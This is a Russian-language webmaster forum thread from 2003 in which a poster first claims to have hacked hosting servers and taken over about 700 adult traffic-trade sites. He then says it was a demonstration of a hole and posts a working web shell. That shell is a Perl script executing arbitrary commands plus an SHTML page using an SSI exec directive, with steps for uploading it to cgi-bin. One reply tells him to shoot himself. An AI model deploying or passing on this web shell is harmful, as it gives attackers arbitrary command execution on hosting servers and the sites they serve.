Добавлено: 16/12/03 в 12:49

Занимался я сиджами в тиновой нише, но че та у меня ничего не получилось. Затратив много времени и не получив с этого денежку, решил взломать свой хостинг. Произошло чудо, в течение минуты я получил шелл на хостинге, мне стало интересно, и я взломал еще 4 спонсорских хостинга. В течение часа я поработил 27 сиджеев. Поставив консоли и диалеры. В итоге сиджеев оказалось очень много, примерно 700 штук.
Посоветуйте как более эффетивно можно применить взломанные сайты ?

Добавлено: 16/12/03 в 13:07

ты ошибся адресом.

Добавлено: 16/12/03 в 13:07

Ты охуел совсем чтоль?

Добавлено: 16/12/03 в 13:27

Застрелиться - для тебя лучший из вариантов.

Добавлено: 16/12/03 в 14:21

1.Дай полные урлы взломаных сайтов.
2.Дай урлы хостинга
3.Оставь пожалуйста свой домашний адрес и телефон и в течении короткого времени мы тебе поможем.

Добавлено: 16/12/03 в 18:09

Ну про шел я поверю, он как правило со своим паролем ломается
А вот про 700 сиджей ... я их даже и не найду столько.

Добавлено: 16/12/03 в 18:34

По моему кто то прикалуется. Взломать СЖи и сразу об этом написать на форуме который владельцы СЖев читают...
Да и матов бы щас в читерах появилось...

Добавлено: 16/12/03 в 19:23

Кому-то скчно стало...
Решил приколоться...

Добавлено: 20/12/03 в 10:10

Вижу многим стало интересно.
Скажу что, сиджи я не взламывал, консоли и диалеры не ставил.
Я хочу вам показать какие проблемы могут возникнуть в вашей работе и какие последствия могут вас ожидать. А последствия, как видно, многим не нравятся (вплоть до ритуального самоубийства)
Эта дыра актуальна и достаточно банальна для всех хостов с сиджеями. Знающие люди поймут.
Пишем 2 файла test.pl и test.shtml. кидаем в CGI-BIN и через браузер запускаем test.shtml и в верхней части пишем команды шелла (cat, less ...) в нижней части будет результат команды. Не забываем редактировать test.shtml в нем прописываем путь к перлу и путь на сервере к файлу test.pl

Содержание test.pl

#! /usr/bin/perl
my $in = $ARGV[0];
$in = substr($in, 4);
$in =~ s/\+/ /g;
$in =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$in =~ s/\r//g;
my @cmd = split(/\n/, $in);
my $out = "";
foreach (@cmd) {
$out .= "===============Команда $_================\n";
$out .= `$_`;
$out =~ tr/ / /s;
}
print $out;
exit;

Содержание test.shtml
<html>
<head>
<title>Shell</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body>
<form action="test.shtml" method="get">
<textarea name="cmd" rows="10" cols="100"></textarea><br>
<input type="submit" value="Отправить">
</form>
<textarea cols="150" rows="20">
<!--#exec cmd="/usr/bin/perl /путь на сервере к файлу/test.pl $QUERY_STRING" -->
</textarea>
</body>
</html>